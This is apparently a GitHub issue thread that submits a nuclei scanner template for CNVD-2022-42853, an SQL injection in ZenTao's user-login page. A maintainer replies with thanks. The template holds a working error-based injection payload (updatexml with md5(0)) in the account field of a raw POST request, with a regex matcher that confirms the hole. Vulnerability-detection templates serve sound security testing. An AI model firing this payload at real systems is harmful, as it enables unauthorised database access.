CNVD-2022-42853 nuclei template

[loulan-ling]

Cookies and Referer are not recommended to be deleted, if deleted, some positives will be forgotten

id: CNVD-2022-42853

info:
  name: zentao cms sql injection 
  author: ling
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cwe-id: CWE-89  
  severity: high
  tags: zentao,cnvd,cnvd2022

requests:
  - raw:
    - |
        POST /zentao/user-login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: zentaosid=ugbh81khpk1r7p1oubmgeieon9; lang=zh-cn; device=desktop; theme=default
        Referer: http://{{Hostname}}/zentao/user-login.html

        account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cmd5%280%29%29%2C1%29+and+%271%27%3D%271        
    matchers:
      - type: regex
        part: all
        regex:
          - "cfcd208495d565ef66e7dff9f98764d"
        condition: and

[loulan-ling]

[princechaddha]

Hi @loulan-ling, Thank you for taking the time to create this issue and for contributing to this project 🍻